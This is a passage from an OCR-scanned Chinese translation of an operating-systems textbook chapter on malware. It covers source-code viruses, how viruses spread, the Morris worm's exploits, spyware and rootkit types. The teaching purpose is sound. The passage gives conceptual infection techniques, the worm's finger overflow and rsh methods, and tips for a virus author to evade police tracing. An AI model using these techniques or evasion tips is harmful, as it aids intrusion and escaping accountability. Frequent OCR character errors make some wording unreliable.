大 多 数 用 户 并 不 理解 警告 的 含义 并 继续 执行 打开 操作 。 而 且 ， 合 法 文件 也 会 包含 宕 。 还 有 很 多 程序 甚至 
不 给 出 警告 ， 这 样 就 更 难以 发 现 病毒 了 。 

随 着 E-mail 附 件数 量 的 增长 ， 发 送 戏 有 安 病毒 的 文档 成 为 越 来 越 严重 的 问题 。 比 起 把 真正 的 引导 扇 
区 隐藏 在 坏 块 列表 以 及 把 病毒 藏 在 中 断 向 量 里 ， 这 样 的 病毒 更 容易 编写 。 这 意味 着 更 多 缺乏 专业 知识 的 
人 都 能 制造 病毒 ， 从 而 降低 了 病毒 产品 的 质量 ， 给 病毒 制造 者 带 来 了 坏 名 声 。 

8. 源 代码 病毒 

寄生 病毒 和 引导 区 病毒 对 操作 系统 平台 有 很 高 的 依赖 性 ， 文 件 病毒 的 依赖 性 就 小 得 多 (Word 运 行 
在 Windows 和 Macintosh 上 ， 但 不 是 UNIX) 。 最 具 移 植 性 的 病毒 是 源 代 码 病毒 (source code virus)。 请 想 
象 图 9-28 ， 若 该 病毒 不 是 寻找 可 执行 二 进 制 文件 ， 而 是 寻找 C 语 言 程序 并 加 以 改变 ， 则 仅仅 改动 一 行 即 
可 (调用 access)。infect 过 程 可 以 在 每 个 源 程序 文件 头 插入 下 面 一 行 : 

#include <virus.h> 

还 可 以 插入 下 面 一 行 来 激活 病毒 : 


run_virus(); 


判断 在 什么 地 方 插 入 需要 对 C 程 序 代 码 进 行 分 析 ， 插 入 的 地 方 必须 能 够 允许 合法 的 过 程 调用 并 不 会 成 为 
无 用 代码 (如 插入 在 return 语 句 后 面 )。 插 入 在 注释 语句 里 也 没什么 效果 ， 插 入 在 循环 语句 里 倒 可 能 是 个 
极 好 的 选择 。 假 设 能 够 正确 地 插入 对 病毒 代码 的 调用 (如 正好 在 main 过 程 结 束 前 ， 或 在 return 语 句 结束 
前 )， 当 程序 被 编译 时 就 会 从 virus.h 处 (虽然 proj.h 可 能 会 引起 更 少 的 注意 ) 获得 病毒 。 

当 程 序 运 行 时 ， 病 毒 也 被 调用 。 病 毒 可 以 做 任何 操作 ， 如 查找 并 感染 其 他 的 C 语 言 程序 。 一 旦 找到 
一 个 C 语 言 程序 ， 病 毒 就 插入 上 面 两 行 代 码 ， 但 这 样 做 仅 对 本 地 计算 机 有 效 ， 并 且 virus.h 必 须 安放 妥当 。 
要 使 病毒 对 远程 计算 机 也 奏效 ， 程 序 中 必须 包括 所 有 的 病毒 源 代码 。 这 可 以 通过 把 源 代码 作为 初始 化 后 
字符 串 来 实现 ， 特 别 是 使 用 一 串 32 位 的 十 六 进 制 整数 来 防止 他 人 识破 企图 。 字 符 串 也 许 会 很 长 ， 但 是 对 
于 今天 的 大 型 代码 而 言 ， 这 是 可 以 轻易 实现 的 。 

对 初学 读者 来 说 ， 所 有 这 些 方法 看 起 来 都 比较 复杂 。 有 人 也 许 会 怀疑 这 样 做 是 否 在 操作 上 可 行 。 事 实 
上 是 可 行 的 。Virgil 是 极为 出 色 的 程序 员 ， 而 且 他 手头 有 许多 空闲 时 间 。 读 者 可 以 看 看 当地 的 报纸 就 知道 了 。 

9. 病毒 如 何 传播 

病毒 的 传播 需要 很 多 条 件 。 让 我 们 从 最 古典 的 方式 谈 起 。Virgil 编 写 了 一 个 病毒 ， 把 它 放 进 了 自己 的 
程序 (或 窃取 来 的 程序 ) 里 ， 然 后 开始 分 发 程序 ， 如 放 入 共享 软件 站 点 。 最 后 ， 有 人 下 载 并 运行 了 程序 。 
这 时 有 好 几 种 可 能 。 病 毒 可 能 开始 感染 硬盘 里 的 大 多 数 文件 ， 其 中 有 些 文件 被 用 户 共享 给 了 自己 的 朋友 。 
病毒 也 可 以 试图 感染 硬盘 的 引导 遍 区 。 一 旦 引导 扇 区 被 感染 ， 就 很 容易 在 核心 态 下 放置 内 存 驻 留 病毒 。 

现在 ，Virgil 也 可 以 利用 其 他 更 多 的 方式 。 可 以 用 病毒 程序 来 查看 被 感染 的 计算 机 是 否 连接 在 局 域 
网 上 ， 如 一 台 机 器 很 可 能 属于 某 个 公司 或 大 学 的 。 然 后 ， 就 可 以 通过 该 局 域 网 感染 所 有 服务 器 上 未 被 保 
护 的 文件 。 这 种 感染 不 会 扩散 到 已 被 保护 的 文件 ， 但 是 会 让 被 感染 的 文件 运行 起 来 十 分 奇怪 。 于 是 ， 运 
行 这 类 程序 的 用 户 会 寻求 系统 管理 员 的 帮助 ， 系 统管 理 员 会 亲自 试验 这 些 奇 怪 的 文件 , 看 看 是 怎么 回 事 。 
如 果 系 统管 理 员 此 时 用 超级 用 户 登录 ， 病 毒 会 感染 系统 代码 、 设 备 驱动 程序 、 操 作 系统 和 引导 遍 区 。 犯 
类 似 这 样 的 一 个 错误 ， 就 会 危及 局 域 网 上 所 有 计算 机 的 安全 。 

运行 在 局 域 网 上 的 计算 机 通常 有 能 力 通过 Internet 或 私人 网 络 登 录 到 远程 计算 机 上 ， 或 者 甚至 有 权 
无 须 登录 就 远程 执行 命令 。 这 种 能 力 为 病毒 提供 了 更 多 传播 的 机 会 。 所 以 往往 一 个 微小 的 错误 就 会 感染 
整个 公司 。 要 避免 这 种 情况 ， 所 有 的 公司 应 该 制定 统一 的 策略 防止 系统 管理 员 犯 错误 。 

另 一 种 传播 病毒 的 方法 是 在 经 常 发 布 程序 的 USENET 新 闻 组 或 网 站 上 张贴 已 被 感染 病毒 的 程序 。 也 
可 以 建立 一 个 需要 特别 的 浏览 器 插件 的 网 页 ， 然 后 确保 插件 被 病毒 感染 上 。 

还 有 一 种 攻击 方式 是 把 感染 了 病毒 的 文档 通过 E-mail 方式 或 USENET 新 闻 组 方式 发 送 给 人 他人， 这些 
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文档 被 作为 邮件 的 附件 。 人 们 从 未 想到 会 去 运行 一 个 陌生 人 邮 给 他 们 的 程序 ， 他 们 也 许 设 有 想到 ， 点 击 
打开 附件 导致 在 自己 的 计算 机 上 释放 了 病毒 。 更 精 的 是 ， 病 毒 可 以 寻找 用 户 的 邮件 地 址 矫 ， 然 后 把 自己 
转发 给 地 址 得 里 所 有 的 人 人， 通常 这 些 邮 件 是 以 看 上 去 合法 的 或 有 趣 的 标题 开头 的 。 例 如 : 

Subject: Change of plans 

Subject: Re; that last e-mail 

Subject; The dog died last night 

Subject; | am seriously ill 

Subject: | love you 


当 邮 件 到 达 时 ， 收 信人 看 到 发 件 人 是 朋友 或 同事 ， 就 不 会 怀疑 有 问题 。 而 一 旦 邮件 被 打开 就 太 晚 了 。 
“ILOVE YOU” 病 毒 在 2000 年 6 月 就 是 通过 这 种 方法 在 世界 范围 内 传播 的 ， 并 导致 了 数 十 亿美 元 的 损失 。 

与 病毒 的 传播 相 联系 的 是 病毒 技术 的 传播 。 在 Internet 上 有 多 个 病毒 制造 小 组 积极 地 交流 ， 相 互 帮助 
开发 新 的 技术 、 工 具 和 病毒 。 他 们 中 的 大 多 数 人 可 能 是 对 病毒 有 癣 好 的 人 而 不 是 职业 罪犯 ,但 带 来 的 后 
果 却 是 灾难 性 的 。 另 一 类 病毒 制造 者 是 军人 ， 他 们 把 病毒 作为 潜在 的 战争 武器 来 破坏 敌人 的 计算 机 系统 。 

与 病毒 传播 相关 的 另 一 个 话题 是 逃避 检测 。 监 狱 的 计算 设施 非常 差 ， 所 以 Virgil 宁 愿 避 开 他 们 。 如 
果 Virgil 将 最 初 的 病毒 从 家 里 的 计算 机 张贴 到 网 上 ， 就 会 产生 危险 。 一 旦 攻击 成 功 ， 警 察 就 能 通过 最 近 
病毒 出 现 过 的 时 间 信 息 跟踪 查找 ， 因 为 这 些 信 息 最 有 可 能 接近 病毒 来 源 。 

为 了 减少 暴露 ，Virgil 可 能 会 通过 一 个 偏远 城市 的 网 吧 登 录 到 Internet 上 。 他 既 可 以 把 病毒 带 到 软盘 
上 自己 打开 ， 也 可 以 在 没有 软磁盘 驱动 器 的 情况 下 利用 隔壁 女士 的 计算 机 读 取 book.doc 文 件 以 便 打印 。 
一 旦 文件 到 了 Virgil 的 硬盘 ， 他 就 将 文件 名 改 为 Virus.exe 并 运行 ， 从 而 感染 整个 局 域 网 ， 并 且 让 病毒 在 
两 周 后 激活 ， 以 防 警 察 列 出 一 周 内 进出 该 城市 机 场 的 可 疑 人 员 名 单 。 

另 一 个 方法 是 不 使 用 软盘 驱动 器 ， 而 通过 远程 FTP 站 点 放置 病毒 。 或 者 带 一 台 笔 记 本 电脑 连接 在 网 吧 
的 Ethenet 或 USB 端 口上 ， 而 网 吧 里 确实 有 这 些 服务 设备 供 携 带 笔 记 本 电脑 的 游客 每 天 查阅 自己 的 电子 邮件 。 

关于 病毒 还 有 很 多 需要 讨论 的 内 容 ， 尤 其 是 他 们 如 何 隐藏 自己 以 及 杀毒 软件 如 何 将 之 发 现 。 在 本 章 
后 面 讨论 恶意 软件 防护 的 时 候 我 们 会 回 到 这 个 话题 。 


9.9.3 蠕虫 

互联 网 计算 机 发 生 的 第 一 次 大 规模 安全 灾难 是 在 1988 年 的 11 月 2 日 ， 当 时 Cornell 大 学 毕业 生 Robert 
Tappan Morris 在 Internet 网 上 发 布 了 一 种 蠕虫 程序 ， 结 果 导 致 了 全 世界 数 以 千 计 的 大 学 、 企 业 和 政府 实 
验 室 计算 机 的 竣 病 。 这 也 导致 了 一 直 未 能 平息 的 争论 。 我 们 稍 后 将 重点 描述 。 具 体 的 技术 细节 请 参阅 
Spafford 的 论文 (1989 版 ) ， 有 关 这 一 事件 的 警方 惊险 描述 请 参见 Hafner 和 Markoff 的 书 (1991 版 ) 。 

故事 发 生 在 1988 年 的 某 个 时 候 ， 当 时 Morris 在 Berkeley 大 学 的 UNIX 系 统 里 发 现 了 两 个 bug， 使 他 能 
不 经 授权 接触 到 Internet 网 上 所 有 的 计算 机 。Morris 完 全 通过 自身 努力 ， 写 了 一 个 能 够 自我 复制 的 程序 ， 
叫 作 蠕虫 (worm) 。 蠕 虫 可 以 利用 UNIX 的 bug ， 在 数秒 钟 内 自我 复制 ， 然 后 迅速 传染 到 所 有 的 机 器 。 
Morris 为 此 工作 了 好 几 个 月 ， 并 想方设法 调试 以 逃避 跟踪 。 

现在 还 不 知道 1988 年 11 月 2 日 的 发 作 是 否 是 一 次 实验 ， 还 是 一 次 真正 的 攻击 。 不 管 怎么 说 ， 病 毒 确 
实 让 大 多 数 Sun 和 VAX 系 统 在 数 小 时 内 臣服 。Morris 的 动机 还 不 得 而 知 ， 也 有 可 能 这 是 他 开 的 一 个 高 科 
技 玩笑 ， 但 由 于 编程 上 的 错误 导致 局 面 无 法 控制 。 

从 技术 上 来 说 ， 蠕 虫 包含 了 两 部 分 程序 ， 引 导 程 序 和 蠕虫 本 身 。 引 导 程 序 是 99 行 的 称 为 11.c 的 程序 ， 
它 在 被 攻击 的 计算 机 上 编译 并 运行 。 一 旦 发 作 ， 它 就 在 源 计算 机 与 宿主 机 之 间 建 立 连接 ， 上传 蠕虫 主体 
并 运行 。 在 花费 了 一 番 周 折 隐 藏 自 身后 ， 蠕 虫 会 查看 新 宿主 机 的 路 由 表 看 它 是 否 连 接 到 其 他 的 机 器 上 ， 
通过 这 种 方式 蠕虫 把 引导 程序 传播 到 所 有 相连 的 机 器 。 

蠕虫 在 感染 新 机 器 时 有 三 种 方法 。 方 法 1 是 试图 使 用 rsh 命 令 运行 远程 shell 程 序 。 有 些 计算 机 信任 其 
他 机 器 ， 人 允许 其 他 机 器 不 经 校 验 就 可 运行 rsh 命 令 。 如 果 方 法 一 可 行 ， 远 程 shell 会 上 传 蠕 虫 主体 ， 并 从 那 
里 继续 感染 新 的 计算 机 。 

方法 2 是 使 用 一 种 在 所 有 系统 上 叫 作 finger 的 程序 ， 该 程序 允许 Internet 上 任何 地 方 的 用 户 通过 键入 
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来 显示 某 人 在 特定 安装 下 的 个 人 信息 。 这 些 信 息 通 常 包 括 : 个 人 姓名 、 登 录 名 、 工 作 和 家 庭 地 址 、 电 话 
号 码 、 传 真 号 码 以 及 类 似 的 信息 。 这 有 点 像 电 话 本 。 

finger 是 这 样 工作 的 。 在 每 个 站 点 有 一 个 叫 作 finger 守 护 进 程 的 后 台 进程 ， 它 一 直 保 持 运行 状态 ， 监 
视 并 回答 所 有 来 自 因特网 的 查询 。 里 虫 所 做 的 是 调用 finger， 并 用 一 个 精心 编写 的 、 由 536 个 特殊 字 节 组 
成 的 字符 串 作 为 参数 。 这 一 长 串 覆 盖 了 守护 进程 的 缓冲 和 栈 ， 如 图 9-21c 所 示 。 这 里 所 利用 的 缺陷 是 守 
护 进程 没有 检查 出 缓冲 区 和 栈 的 溢出 情形 。 当 守护 进程 从 它 原 先 获 得 请 求 时 所 在 的 过 程 中 返回 时 ， 它 返 
回 的 不 是 main ， 而 是 栈 上 536 字 节 中 包含 的 过 程 。 该 过 程 试 图 运行 sh。 如 果 成 功 ， 蠕 虫 就 掌握 了 被 攻击 
计算 机 里 运行 的 shell。 

方法 3 是 依靠 电子 邮件 系统 里 的 sendmail 程 序 ， 利 用 它 的 bug 允 许 蠕虫 发 送 引 导 程 序 的 备份 并 运行 。 

蠕虫 一 旦 出 现 就 准备 破解 用 户 密码 。Morris 没 有 在 这 方面 做 大 量 的 有 关 研 究 。 他 所 做 的 是 问 自 己 的 
父亲 ， 一 名 美国 国家 安全 局 (该 局 是 美国 政府 的 密码 破解 机 构 ) 的 安全 专家 ， 要 一 份 Morris Sr. 和 Ken 
Thompson 十 年 前 在 Bell 实 验 室 合 著 的 经 典 论文 (Morris 和 Thompson,1979) 。 每 个 被 破译 的 密码 允许 蠕虫 
登录 到 任何 该 密码 所 有 者 具有 账号 的 计算 机 上 。 

每 一 次 蠕虫 访问 到 新 的 机 器 ， 它 就 查看 是 否 有 其 他 版 本 的 蠕虫 已 经 存活 。 如 果 有 ， 新 的 版 本 就 退出 ， 
但 七 次 中 有 一 次 新 蠕虫 不 会 退出 。 即 使 系统 管理 员 启 动 了 旧 蠕 虫 来 思 和 弄 新 蠕虫 也 是 如 此 ， 这 大 概 是 为 了 
给 自己 做 宣传 。 结 果 ， 七 次 访问 里 的 一 次 产生 了 太 多 的 蠕虫 ， 导 致 了 所 有 被 感染 机 器 的 停机 : 它们 被 蠕 
虫 感染 了 。 如 果 Meorris 放 弃 这 一 策略 ， 只 是 让 新 蠕虫 在 旧 蠕 虫 存在 的 情况 下 退出 ， 蠕 虫 也 许 就 不 那么 容 
易 被 发 现 了 。 

Morris 的 一 个 朋友 试图 向 纽约 时 报 记 者 John Markoff 说 明 整 个 事件 是 个 意外 、 蠕 虫 是 无 害 的 ， 而 
此 时 Morris 本 人 却 被 捕 了 。Morris 的 朋友 不 经 意 地 流露 出 罪犯 的 登录 名 是 rtm。 把 rtm 转 换 成 用 户 名 十 
分 简单 一 一 Markoff 所 要 做 的 只 是 运行 finger。 第 二 天 ， 故 事 上 了 头条 新 闻 ， 三 天 后 影响 力 其 至 超过 了 
总 统 选举 。 

Morris 被 联邦 法 院 审判 并 证 实 有 罪 。 他 被 判 10 000 美 元 罚款 ， 三 年 察看 和 400 小 时 的 社区 服务 。 他 的 法 
律 费用 可 能 超过 了 150 000 美 元 。 这 一 判决 导致 了 大 量 的 争论 。 许 多 计算 机 业界 人 员 认 为 他 是 个 聪明 的 研究 
生 ， 只 不 过 恶作剧 超出 了 控制 。 蠕 虫 程序 里 没有 证 据 表明 Morris 试 图 偷窃 或 妇 坏 什么 。 而 其 他 人 认为 Morris 
是 个 严重 的 罪犯 必须 蹲 监狱 。Morris 后 来 在 哈佛 大 学 获得 了 博士 学 位 ， 现 在 他 是 一 名 麻 省 理工 学 院 的 教授 。 

这 一 事件 导致 的 永久 结果 是 建立 了 计算 机 应 急 响应 机 构 (Computer Emergency Response Team, 
CERT) ， 这 是 一 个 发 布 病毒 人 侵 报告 的 中 心机 构 ， 有 多 名 专家 分 析 安 全 问题 并 设计 补丁 程序 。CERT 有 了 
自己 的 下 载 网 站 ，CERT 收 集 有 关 会 受到 攻击 的 系统 缺陷 方面 的 信息 并 告知 如 何 修复 。 重 要 的 是 ， 它 把 这 
类 信息 周期 发 布 给 Internet 上 的 数 以 千 计 的 系统 管理 员 。 但 是 ， 某 些 别有用心 的 人 (可 能 假装 成 系统 管理 
员 ) 也 可 以 得 到 关于 系统 bug 的 报告 ， 并 在 这 些 bug 修 复 之 前 花费 数 小 时 (或 数 天 ) 寻找 破门 的 捷径 。 

从 Morris 蠕 虫 出 现 开始 ， 越 来 越 多 种 类 的 蠕虫 病毒 出 现在 网 络 上 。 这 些 蠕 虫 病毒 的 机 制 与 Morris 一 
样 ， 所 不 同 之 处 只 是 利用 系统 中 不 同 软 件 的 不 同 漏洞 。 由 于 蠕虫 能 够 自我 复制 ， 因 此 扩散 趋势 比 病毒 要 
快 。 共 结果 是 ， 越 来 越 多 的 反 蠕虫 技术 被 开发 出 来 ,它们 大 多 都 试图 在 蠕虫 第 一 次 出 现 的 时 候 将 其 发 现 ， 
而 不 是 在 它们 进入 中 心 数据 库 时 才 实 施 侦 测 (Portokalidis 和 Bos, 2007)。 


9.9.4 间谍 软件 

间谍 软件 (spyware) 是 一 种 迅速 扩散 的 恶意 软件 ， 粗 略 地 讲 ， 间 谍 软 件 是 在 用 户 不 知情 的 情况 下 
加 载 到 PC 上 的 ， 并 在 后 台 做 一 些 超出 用 户 意 愿 的 事情 。 但 是 要 定义 它 却 出 乎 意料 的 微妙 。 比 如 Windows 
自动 更 新 程序 下 载 安全 组 件 到 安装 有 Windows 的 机 器 上 ， 用 户 不 需要 干预 。 同 样 地 ， 很 多 反 病 毒 软件 也 
在 后 台 自动 更 新 。 上 述 的 两 种 情况 都 不 被 认为 是 间谍 软件 。 如 果 Potter Stewart 还 健在 的 话 ， 他 也 许 会 说 : 
“我 不 能 定义 间谍 软件 ， 但 只 要 我 看 见 它 ， 我 就 知道 。 

其 他 人 通过 努力 ， 进 一 步 地 尝试 定义 间谍 软件 。Barwinski 等 人 认为 它 有 四 个 特征 : 首先 ， 它 隐藏 
自身 ， 所 以 用 户 不 能 轻易 地 找到 ， 其 次 ， 它 收集 用 户 数据 〈 如 访问 过 的 网 址 、 密 码 或 信用 卡号 ) ， 再 次 ， 
它 将 收集 到 的 资料 传 给 远程 的 监控 者 ， 最后， 在 卸载 它 时 ， 间 谍 软 件 会 试图 进行 防御 。 此 外 ， 一 些 间 谍 
软件 改变 设置 或 者 进行 其 他 的 恶意 行为 。 
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Barwinski 等 人 将 间谍 软件 分 成 了 三 大 类 。 第 一 类 是 为 了 营销 : 该 类 软件 只 是 简单 地 收集 信息 并 发 
送 给 控制 者 ， 以 更 好 地 将 广告 投放 到 特定 的 计算 机 。 第 二 类 是 为 了 监视 : 某 些 公司 故意 在 职员 的 电脑 上 
安装 间谍 软件 ， 监 视 他 们 在 做 什么 ， 在 浏览 什么 网 站 。 第 三 类 接近 于 典型 的 恶意 软件 ， 被 感染 的 电脑 成 
为 僵尸 网 络 中 的 一 部 分 ， 等 待 控制 者 的 指令 。 

他 们 做 了 一 个 实验 ， 通 过 访问 5000 个 网 站 看 什么 样 的 网 站 含有 间谍 软件 。 他 们 发 现 这 些 网 站 和 成 人 
娱乐 、 盗 版 软件 、 在 线 旅行 有 关 。 

华盛顿 大 学 做 了 一 个 覆盖 面 更 广 的 调查 (Moshchuk 等 人 ，2006) 。 在 他 们 的 调查 中 ， 约 18 000 000 
个 URL 被 感染 ， 并 且 6% 被 发 现 含 有 间谍 软件 。 所 以 AOL/NCSA 所 作 的 调查 就 不 奇怪 了 : 在 接受 调查 的 
家 用 计算 机 中 ，80% 深 受 间 谍 软 件 的 危害 ,平均 每 台 计 算 机 有 93 个 该 类 软件 。 华 盛 顿 大 学 的 调查 发 现成 
人 、 明 星 和 桌面 壁纸 相关 的 网 站 有 最 高 的 感染 率 ， 但 他 们 没有 调查 旅行 相关 的 网 站 。 

1. 间谍 软件 如 何 扩散 

显然 ， 接 下 来 的 问题 是 :“ 一 台 计 算 机 是 如 何 被 间谍 软件 感染 的 ? ”一 种 可 能 途径 和 所 有 的 恶意 软 
件 是 一 样 的 : 通过 木马 。 不 少 的 免费 软件 是 包含 有 间谍 软件 的 ， 软 件 的 开发 者 可 能 就 是 通过 间谍 软件 而 
获 利 的 。P2P 文 件 共享 软件 〈 比 如 Kazaa) 就 是 间谍 软件 的 温床 。 此 外 ， 许 多 网 站 显示 的 广告 条 幅 直接 指 
向 了 含有 间谍 软件 的 网 页 。 

另 一 种 主要 的 感染 途径 叫 作 下 载 驱动 (drive-by down load), 仅仅 访 问 网 页 就 可 能 感染 间谍 软件 
(实际 上 是 恶意 软件 )。 执 行 感染 的 技术 有 三 种 。 首 先 ， 网 页 可 能 将 浏览 器 导向 一 个 可 执行 文件 (exe), 
当 浏 览 器 访问 此 文件 时 ， 会 弹出 一 个 对 话 框 提示 用 户 运 行 、 或 保存 该 文件 。 因 为 合法 文件 的 下 载 也 是 一 
样 的 机 制 ， 所 以 大 部 分 用 户 直 接点 击 执行 ， 导 致 浏览 器 下 载 并 运行 该 软件 。 然 后 电脑 就 被 感染 了 ， 间 谍 
软件 可 以 做 它 想 做 的 任何 事 。 

第 二 种 常见 的 途径 是 被 感染 的 工具 条 。IE 和 Firefox 这 两 种 浏览 器 都 支持 第 三 方 工具 条 。 一 些 间谍 软 
件 的 作者 创建 很 好 看 的 功能 也 不 错 的 工具 条 ， 然 后 广泛 地 宣传 。 用 户 一 旦 安装 了 这 样 的 工具 条 也 就 被 感 
染 了 ， 比 如 ， 流 行 的 Alexa 工 具 条 就 含有 间谍 软件 。 从 本 质 上 讲 ， 这 种 感染 机 制 很 像 木 马 ， 只 是 包装 不 同 。 

第 三 种 感染 的 途径 更 狭 独 。 很 多 网 页 都 使 用 一 种 微软 的 技术 ， 叫 作 ActiveX 控 件 。 这 些 控件 是 在 浏 
览 器 中 运行 并 扩展 其 功能 的 二 进 制 代码 。 例 如 ， 显 示 某 种 特定 的 图 片 、 音 频 或 视频 网 页 。 从 原则 上 讲 ， 
这 些 技术 非常 合法 。 实 际 上 它 非常 的 危险 ， 并 可 能 是 间谍 软件 感染 的 主要 途径 。 这 项 技术 主要 针对 IE， 
很 少 针对 Firefox 或 其 他 类 型 的 浏览 器 。 

当 访问 一 个 含有 ActiveX 控 件 的 网 页 时 ， 发 生 什 么 情况 取决 于 正 的 安全 性 设置 。 如 果 安 全 性 设置 太 
低 ， 间 谍 软 件 就 自动 下 载 并 执行 了 。 安 全 性 设置 低 的 原因 是 如 果 设 置 太 高 ， 许 多 的 网 页 就 无 法 正常 显示 
(或 根本 无 法 显示 )， 或 者 正 会 一 直 进 行 提示 ， 而 用 户 并 不 清楚 这 些 提 示 的 作用 。 

现在 我 们 假设 用 户 有 很 高 的 安全 性 设置 。 当 访问 一 个 被 感染 的 网 页 时 ，IE 检 测 到 有 ActiveX 控 件 ， 
然后 弹出 一 个 对 话 框 ， 包 含有 网 页 内 容 提 示 ， 比 如 : 

你 希望 安装 并 运行 一 个 能 加 速 网 页 访问 的 程序 吗 ? 

大 多 数 人 认为 很 不 错 ， 然 后 点 “是 ”。 好 吧 ， 这 是 过 去 的 事情 。 聪 明 的 用 户 可 能 会 检查 对 话 框 其 他 
的 内 容 ， 还 有 其 他 两 项 。 一 个 是 指向 从 来 没有 听 说 过 的 ， 也 没有 包含 任何 有 用 信息 的 认证 中 心 的 链接 ， 
这 其 实 只 表明 该 认证 中 心 只 担保 这 家 网 站 的 存在 ， 并 有 足够 的 钱 支付 认证 的 费用 。ActiveX 控 件 实际 上 
可 以 做 任何 事情 ， 所 以 它 非常 强大 ， 并 且 可 能 让 用 户 很 头疼 。 由 于 虚假 的 提示 信息 ， 即 使 聪明 的 用 户 也 
常常 选择 “是 ”。 

如 果 他 们 点 “不 是 "， 在 网 页 上 的 脚本 则 利用 卫 的 bug， 试 图 继续 下 载 间 谍 软 件 。 不 过 没有 可 利用 的 
bug ， 就 会 一 次 次 试图 下 载 该 控件 ， 一 次 次 的 弹出 同样 的 对 话 框 。 此 时 ， 大 多 数 人 不 知道 该 怎么 办 ( 打 
开 任 务 管理 器 ， 杀 掉 IE 的 进程 )， 所 以 他 们 最 终 放弃 并 选择 “是 ”。 

通常 情况 下 ， 下 一 步 是 间谍 软件 显示 20 ~30 页 用 陌生 的 语言 撰写 的 许可 凭证 。 一 旦 用 户 接 受 了 许可 
赁 证， 他 就 到 失 了 起 诉 间 谍 软 件 作者 的 机 会 ， 因 为 他 同意 了 该 软件 的 运行 ， 即 使 有 时 候 当 地 的 法 律 并 不 
认可 这 样 的 许可 凭证 (如 果 许 可 凭证 上 说 “本 和 凭证 坚定 地 授予 凭证 发 放 者 杀害 凭证 接受 者 的 母亲 ， 并 继 
承 其 遗产 的 权利 "， 赁 证 发 放 者 依然 很 难说 服 法 庭 ) 。 l 
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2. 间谍 软件 的 行为 

现在 让 我 们 看 看 间谍 软件 的 常见 行为 : 

* 更 改 浏览 器 主页 。 

。 修 改 浏 览 器 收藏 页 。 

* 在 浏览 器 中 增加 新 的 工具 条 。 

。 更 改 用 户 默 认 的 媒体 播放 器 。 

。 更 改 用 户 默认 的 搜索 引擎 。 

。 在 Windows 桌 面 上 增加 新 的 图 标 。 

。 将 网 页 上 的 广告 条 替换 成 间谍 软件 期 望 的 样子 。 

。 在 标准 的 Windows 对 话 框 中 增加 广告 。 

。 不 停 地 产生 广告 。 

最 前 面 的 三 条 改变 了 浏览 器 的 行为 ， 即 使 重启 操作 系统 也 不 能 恢复 以 前 的 设置 。 这 种 攻击 叫 作 动 持 
浏览 器 (brower hijacking)。 接 下 来 的 两 条 修改 了 Windows 注 册 表 的 设置 ， 把 用 户 引 向 了 另外 的 媒体 播 
放 器 (播放 间谍 软件 所 期 望 的 广告 ) 和 搜索 引擎 (返回 间谍 软件 所 期 望 的 网 页 )。 在 桌面 上 添加 图 标 显 
然 是 希望 用 户 运行 新 安装 的 程序 。 替 换 网 页 广告 条 (468 x 60.gif 图 像 ) 就 像 所 有 被 访问 过 网 页 一 样 ， 为 
间谍 软件 指定 的 网 页 打 广 告 。 最 后 一 项 是 最 麻烦 的 : 一 个 可 关闭 的 广告 立刻 产生 另 一 个 弹出 广告 ， 以 臻 
无 法 结束 。 此 外 ， 间 谍 软 件 常常 关闭 防火 墙 、 卸 载 其 他 的 间谍 软件 ， 并 可 能 导致 其 他 的 恶意 行为 。 

许多 间谍 软件 有 和 印 载 程序 ， 当 这 些 务 载 程 序 几 乎 不 能 用 ， 所 以 经 验 不 足 的 用 户 没有 办 法 印 载 。 幸 运 
的 是 ,一 个 新 的 反 间谍 软件 产业 已 经 兴起 ， 现 有 的 反 病 毒 厂商 跃跃欲试 。 

间谍 软件 不 应 该 和 广告 软件 (adware) 混淆 起 来 ， 合 法 的 软件 生产 商 提 供 了 两 种 软件 版 本 : 一 个 含 
有 广告 的 免费 版 本 和 一 个 不 含 广告 的 付费 版 本 。 软 件 生产 商 的 这 种 办 法 非常 聪明 ， 用 户 为 了 不 受 广告 的 
烦 扰 ， 而 不 得 不 升级 到 付费 版 本 。 

9.9.5 rootkit 

rootkit 是 一 个 程序 或 一 些 程序 和 文件 的 集合 ， 它 试图 隐藏 其 自身 的 存在 ， 即 使 被 感染 主机 的 拥有 者 
已 经 决定 对 其 进行 定位 和 删除 。 在 通常 情况 下 ，rootkit 包 含 一 些 同 样 具有 隐藏 性 的 恶意 软件 。rootkit 可 
以 用 我 们 目前 讨论 过 的 任 一 方法 进行 安装 ， 包 括 病 毒 、 蠕 虫 和 间谍 软件 ， 也 可 以 通过 其 他 方法 进行 安装 。 
我 们 将 稍 后 讨论 其 中 的 一 种 。 

1. rootkit 的 类 型 

我 们 讨论 目前 可 能 的 五 种 rootkit。 根 据 “rootkit 在 哪里 隐藏 自己 ”， 我 们 自 底 向 上 将 rootkit 分 为 如 下 几 类 : 

1) 固件 rootkit。 至 少 从 理论 上 讲 ， 一 个 rootkit 可 以 通过 更 新 BIOS 来 隐藏 自己 在 BIOS 中 。 只 要 主机 
被 引导 启动 或 者 一 个 BIOS 函 数 被 调用 ， 这 种 rootkit 就 可 以 获得 控制 。 如 果 rootkit 在 每 次 使 用 后 对 自己 加 
密 而 在 每 次 使 用 前 对 自己 解密 ， 它 就 很 难 被 发 现 。 这 种 rootkit 在 现实 环境 下 还 没有 发 现 。 

2) 管理 程序 rootkit。 这 是 一 种 尤其 插 鄙 的 rootkit， 它 可 以 在 一 个 由 自己 控制 的 虚拟 机 中 运行 整个 操 
作 系 统 和 所 有 应 用 程序 。 第 一 个 概念 证 明 蓝 药丸 (blue pill， 取 自 电影 《黑客 帝国 》) 在 2006 年 被 波兰 黑 
客 Joanna Rutkowska 提 出 。 这 种 rootkit 通 常 更 改 引 导 顺 序 以 便 它 能 在 主机 启动 时 在 裸 机 下 执行 管理 程序 ， 
这 个 管理 程序 会 在 一 个 虚拟 机 中 启动 操作 系统 和 所 有 应 用 程序 。 与 前 一 种 方法 类 似 ， 这 种 方法 的 优点 在 
于 没有 任何 东西 隐藏 在 操作 系统 、 库 或 者 程序 中 ， 因 此 检查 这 些 地 方 的 rootkit 检 测 程序 就 显得 不 足 。 

3) 内 核 rootkit。 目 前 最 常见 的 rootkit 感 染 操 作 系 统 并 作为 驱动 程序 或 可 引导 内 核 模块 隐藏 于 其 中 。 
这 种 rootkit 可 以 轻松 地 将 一 个 大 而 复杂 且 频 繁 变化 的 驱动 程序 替换 为 一 个 新 的 驱动 程序 ， 这 个 新 的 驱动 
程序 既 包 含 原 驱动 程序 又 包含 rootkit。 

4) 库 rootkit。 另 一 个 rootkit 可 以 隐藏 的 地 方 是 系统 库 ， 如 Linux 中 的 libc。 这 种 位 置 给 恶意 软件 提供 
